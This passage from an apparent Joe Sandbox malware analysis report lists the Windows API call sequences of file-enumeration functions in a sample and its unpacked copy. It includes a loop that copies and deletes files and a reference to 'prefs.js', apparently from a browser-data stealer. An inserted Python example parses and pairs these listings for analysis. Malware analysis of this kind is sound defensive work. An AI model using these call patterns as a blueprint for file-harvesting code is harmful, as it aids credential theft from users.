                                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                        • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s$%s\%s$%s\*
                                                        • API String ID: 180737720-445461498
                                                        • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                        • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                        • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                        • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B33B33
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B33B4A
                                                        • lstrcat.KERNEL32(?,?), ref: 00B33B9C
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00B33BAE
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 00B33BC4
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B33ECE
                                                        • FindClose.KERNEL32(000000FF), ref: 00B33EE3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 1125553467-0
                                                        • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                        • Instruction ID: e3fb5d22718869cf19de6ce6ff4a15564bcf1d0f63dee752e3b2734d0fb13cff
                                                        • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                        • Instruction Fuzzy Hash: 3EA17CB6A40218ABDB30DBA4DC85FEE73B9FB49700F1445C8B60D96141EB759B84CF62
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                        • wsprintfA.USER32 ref: 004145A6
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                        • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                        • lstrcatA.KERNEL32(?,0082B7A0,?,00000104), ref: 004146C5
                                                        • lstrcatA.KERNEL32(?,0082AA50), ref: 004146D8
                                                        • lstrlenA.KERNEL32(?), ref: 004146E5
                                                        • lstrlenA.KERNEL32(?), ref: 004146F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                        • String ID: %s\%s$%s\*
                                                        • API String ID: 13328894-2848263008
                                                        • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                        • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                        • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                        • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B34B93
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                        • FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                        • Instruction ID: 63055327a5abe9808d4ac03eb6cbb35fdb6fcb7fd4a26b7d966b42603be6d56f
                                                        • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                        • Instruction Fuzzy Hash: 6B6175B5940218ABCB24EBE0DD45FEA73BDFB59700F0045C8B50992141EB75AB45CF91
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 00B2C15C
                                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 00B2C1B4
                                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 00B2C1CA
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2CA26
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2CA38
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                        • Instruction ID: ce2fc135b262d0a5adce4b0193b666cf6f7bf99a20d09bdd53ac8832db2eccd9
                                                        • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                        • Instruction Fuzzy Hash: 57425272900114ABCB14FBB0DD96EED77B9AF95300F6045E8B54AA6091EF349F48CF92
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00413EC3
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                        • FindClose.KERNEL32(000000FF), ref: 00414081
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s
                                                        • API String ID: 180737720-4073750446
                                                        • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                        • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                        • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                        • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B347E7
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B347EE
                                                        • wsprintfA.USER32 ref: 00B3480D
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B34824
                                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00B34852
                                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00B34868
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B348F2
                                                        • FindClose.KERNEL32(000000FF), ref: 00B34907
                                                        • lstrcat.KERNEL32(?,0064A524), ref: 00B3492C
                                                        • lstrcat.KERNEL32(?,0064A22C), ref: 00B3493F
                                                        • lstrlen.KERNEL32(?), ref: 00B3494C
                                                        • lstrlen.KERNEL32(?), ref: 00B3495D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                        • String ID:
                                                        • API String ID: 671575355-0
                                                        • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                        • Instruction ID: 4ed5c1e1bb0abc3b94cd6eb2617230a5a39fb81769376c7270a96391796e3921
                                                        • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                        • Instruction Fuzzy Hash: C65186B9580218ABC720EBB0DD89FED73BDEB54300F4045C8F64992190EB759B84CF92
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B3412A
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B34141
                                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00B3416F
                                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00B34185
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B342D3
                                                        • FindClose.KERNEL32(000000FF), ref: 00B342E8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                        • Instruction ID: e6252775c439095cee4dd9fe20266b24a2b4c9ca19410fd06dc1361c30cf6233
                                                        • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                        • Instruction Fuzzy Hash: 165163B6900218BBCB24FBB0DD85EEA73BDFB55300F0045C8B64992040EB75AB858F95
                                                        APIs
                                                        • wsprintfA.USER32 ref: 0040ED3E
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                        • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\*.*
                                                        • API String ID: 180737720-1013718255
                                                        • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                        • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                        • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                        • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                        • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                        • String ID: 4@$\*.*
                                                        • API String ID: 2325840235-1993203227
                                                        • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                        • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                        • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                        • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                        • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID: prefs.js
                                                        • API String ID: 3334442632-3783873740
                                                        • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                        • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                        • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                        • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                        • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                        • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                        • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                        • String ID: \*.*
                                                        • API String ID: 1415058207-1173974218
                                                        • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                        • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                        • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                        • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
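The per-function listings above share one shape (a search path built with wsprintfA, FindFirstFileA, two StrCmpCA calls, FindNextFileA, FindClose, and in the 00401923 function CopyFileA and DeleteFileA inside the loop), and several functions appear twice: once in the on-disk image at 0x400000 and once in the 0xB20000 dump, where the copy still references the same 0x0042xxxx string addresses. The Python below is an example added here, not part of the Joe Sandbox report or its tooling: it parses records in this listing format, tags each function from its call order, and pairs the image and dump copies through their shared StrCmpCA operand addresses. The sample is three records copied from this section with the Source File names shortened; the regexes, the tag names and the pairing heuristic are the example's own assumptions, not Joe Sandbox fields.

```python
"""Parse the per-function API listings of a Joe Sandbox IDA-plugin report, tag
directory-enumeration loops, and pair each function in the on-disk image
(0x400000) with its unrelocated copy in the unpacked region (0xB20000).
Added example for this page; not Joe Sandbox's own code."""
import re
from collections import defaultdict

# Constructed sample: three records copied from the report, trimmed to the lines
# the parser uses (Source File names shortened with "..."); one "Part of
# subcall" line is kept to show that it is skipped.
SAMPLE = """\
APIs
• wsprintfA.USER32 ref: 00413EC3
• FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
• StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
• StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
• FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
• FindClose.KERNEL32(000000FF), ref: 00414081
• Source File: ...0000000000400000...sdmp, Offset: 00400000, based on PE: true
• String ID: %s\\%s
APIs
• wsprintfA.USER32 ref: 00B3412A
• FindFirstFileA.KERNEL32(?,?), ref: 00B34141
• StrCmpCA.SHLWAPI(?,00420FAC), ref: 00B3416F
• StrCmpCA.SHLWAPI(?,00420FB0), ref: 00B34185
• FindNextFileA.KERNEL32(000000FF,?), ref: 00B342D3
• FindClose.KERNEL32(000000FF), ref: 00B342E8
• Source File: ...0000000000B20000...sdmp, Offset: 00B20000, based on PE: false
• String ID:
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
• StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
• StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
• DeleteFileA.KERNEL32(00000000), ref: 00401DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
• FindClose.KERNEL32(000000FF), ref: 00401E32
• Source File: ...0000000000400000...sdmp, Offset: 00400000, based on PE: true
• String ID: \\*.*
"""

API_RE = re.compile(r"^•\s+(?P<api>\w+)\.\w+(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$")
SRC_RE = re.compile(r"Offset:\s+([0-9A-F]{8}), based on PE:\s+(true|false)")
STR_RE = re.compile(r"^•\s+String ID:\s*(.*)$")


def parse_records(text):
    """One record per 'APIs' block: ordered (api, args, ref) calls plus region info."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(cur := {"apis": [], "offset": None, "pe": None, "string_id": ""})
        elif cur is None or line.startswith("• Part of subcall"):
            continue  # subcall lines describe callees, not this function
        elif m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur["apis"].append((m["api"], args, int(m["ref"], 16)))
        elif m := SRC_RE.search(line):
            cur["offset"], cur["pe"] = int(m[1], 16), m[2] == "true"
        elif m := STR_RE.match(line):
            cur["string_id"] = m[1]
    return records


def classify(rec):
    """Tags derived only from the call order shown in the listing (assumed names)."""
    names = [api for api, _, _ in rec["apis"]]
    tags = set()
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= set(names):
        first, nxt = names.index("FindFirstFileA"), names.index("FindNextFileA")
        # Two StrCmpCA calls between FindFirstFile and FindNextFile have the shape
        # of a "." / ".." skip; the listing does not show the compared strings.
        if names[first:nxt].count("StrCmpCA") >= 2:
            tags.add("dir_walk")
        if "wsprintfA" in names[:first]:
            tags.add("builds_search_pattern")  # format string becomes the search path
    tags |= {t for api, t in (("CopyFileA", "copies_files"), ("DeleteFileA", "deletes_files"))
             if api in names}
    return tags


def compare_key(rec):
    """StrCmpCA second operands are absolute string addresses inside the 0x400000
    image; an unrelocated copy of the code references exactly the same ones."""
    return tuple(args[-1] for api, args, _ in rec["apis"] if api == "StrCmpCA" and args)


def entry(rec):
    return next(ref for api, _, ref in rec["apis"] if api == "FindFirstFileA")


def pair_across_regions(records):
    """compare_key -> {'image': ref, 'dump': ref, 'delta': dump - image}."""
    by_key = defaultdict(dict)
    for rec in records:
        if (key := compare_key(rec)) and rec["offset"] is not None:
            by_key[key]["image" if rec["pe"] else "dump"] = entry(rec)
    return {k: {**v, "delta": v["dump"] - v["image"]}
            for k, v in by_key.items() if {"image", "dump"} <= set(v)}
```

Run on the sample, the 00413EDA/00B34141 pair gives a delta of 0x720267, and the other image/dump pairs visible in this section (0040ED55/00B2EFBC and 0040DAEB/00B2DD52) give the same value, consistent with the dump holding a copy of the image's code that still points at the image's own string addresses. The 00401923 function is tagged as a directory walk that copies and deletes files but stays unpaired, since no 0xB20000 counterpart with the 0042526C/00425314 operands appears in the listing. Because the report never shows what StrCmpCA compares against, the "dir_walk" tag records only the shape of the loop.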
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B2EFA5
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B2EFBC
                                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 00B2F012
                                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 00B2F028
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2F515
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2F52A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
